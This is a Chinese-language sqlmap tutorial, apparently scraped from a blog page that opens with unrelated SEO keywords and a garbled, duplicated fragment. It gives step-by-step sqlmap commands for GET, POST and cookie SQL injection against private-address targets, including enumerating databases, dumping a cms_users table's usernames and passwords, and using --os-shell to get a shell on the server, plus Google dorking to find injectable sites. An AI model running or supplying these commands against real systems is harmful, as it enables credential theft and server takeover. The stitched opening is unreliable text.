如何做网站水晶头,绿色营销案例100例,湖州小程序开发,接app推广sqlmap 是kali 里面的工具 sqlmap对注入点注入
1 如果是 get 注入#xff0c;直接#xff0c;sqlmap -u 注入点网址.
2 如果是 post 注入#xff0c;可以 sqlmap –r burp 地址访问包”
3 如果是 cookie#xff0c;X-Forwarded-For 等#xff0c…sqlmap 是kali 里面的工具 sqlmap对注入点注入
1 如果是 get 注入直接sqlmap -u 注入点网址.
2 如果是 post 注入可以 sqlmap –r burp 地址访问包”
3 如果是 cookieX-Forwarded-For 等可以访问的时候用 burpsuite 抓包注入处用号替 换放到文件里然后 sqlmap -r 文件地址记得加上—level 3 参数
写入getshell
sqlmap -u http://192.168.16.119/show.php?id33 --os-shell 实战
注入点 cms权限
注入点http://10.9.75.140/cms/show.php?id33
sqlmap -u http://10.9.75.140/cms/show.php?id33
#检测注入点
sqlmap -u http://10.9.75.140/cms/show.php?id33 --dbs
#列出所有的库名
sqlmap -u http://10.9.75.140/cms/show.php?id33 --current-db
#当前数据库的名字
sqlmap -u http://10.9.75.140/cms/show.php?id33 -D cms --tables
#指定目标数据库为cms列出数据库中所有的表名
sqlmap -u http://10.9.75.140/cms/show.php?id33 -D cms -T cms_users --columns
#指定目标数据库为cms指定目标表名为cms_users列出所有的字段名
sqlmap -u http://10.9.75.140/cms/show.php?id33 -D cms -T cms_users -C username,password --dump
#指定目标数据库为cms指定目标表名为cms_users列出字段内容 更新
sudo apt-get update
sudo apt-get install sqlmap 重要参数
u检测注入点–dbs列出所有的库名–current-user当前连接数据库用户的名字–current-db当前数据库的名字-D “cms” –tables指定目标数据库为cms 列出数据库中所有的表名-T “cms_users”指定目标表名为’cms_users’–columns -C ‘username,password’列出所有的字段名 指定目标字段–dump -r列出字段内容 从文件中读取HTTP 请求–os-shell在特定情况下可以直接获得目标系统Shell–level 3设置sqlmap 检测等级 3–cookie”usernameadmin”携带Cookie 信息进行注入-g –batch利用google 搜索引擎自动搜索注入点 使用默认选项–random-agent使用随机User-Agent 信息-v 3显示payload
